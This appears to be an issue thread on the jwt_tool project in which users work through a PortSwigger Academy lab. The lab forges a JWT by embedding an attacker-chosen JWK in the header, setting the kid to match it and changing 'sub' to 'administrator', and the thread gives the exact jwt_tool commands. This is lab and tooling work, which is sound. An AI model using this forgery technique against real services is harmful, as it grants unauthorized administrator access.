JWK inline + payload modification

[0x2LFA]

Hi,

I am trying to solve this lab from PortSwigger academy using jwt_tool.

In order to solve the lab, one needs to inject a jwk into jwt header, like the following:

{
    "kid": "76e1647e-29a6-4555-bfb1-ce848c18cbd5",
    "typ": "JWT",
    "alg": "RS256",
    "jwk": {
        "kty": "RSA",
        "e": "AQAB",
        "kid": "76e1647e-29a6-4555-bfb1-ce848c18cbd5",
        "n": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
    }
}

Also modify the payload to change sub into administrator:

{
    "iss": "portswigger",
    "exp": 1732711092,
    "sub": "administrator"
}

Then sign the jwt with injected key in jwk.

---

So far I've tried different combinations of options to obtain the requested JWT, without success.

For example I've tried:

jwt_tool.py -t {URL}  -rc 'session={JWT}' -I -pc sub -pv administrator -v

And got the jwt with modified payload:

Token: {"kid":"d2021ecd-3c75-4ca0-8715-e6b9829f930e","alg":"RS256"}.{"iss":"portswigger","exp":1732710178,"sub":"administrator"}.xxxxxxxxxxxxxxx

But then how can I use it with option -X i to inject inline jwt ?

[rbrown256]

I came here for this as I wanted to inspect the source to find if this is a bug. I'm glad (so to speak) that somebody else has the same issue.

Now using jwt_tool with -X i injects the JWK but does not change the kid:

This means that the server-side will be verifying the JWT payload using the signature from the original key (d2a8...).

What you need to do is update the kid to match with the following parameters:

-hc kid -hv jwt_tool

This makes the kid refer to the injected JWK:

[rbrown256]

I've created a fix here if you want to test this version with your original parameters?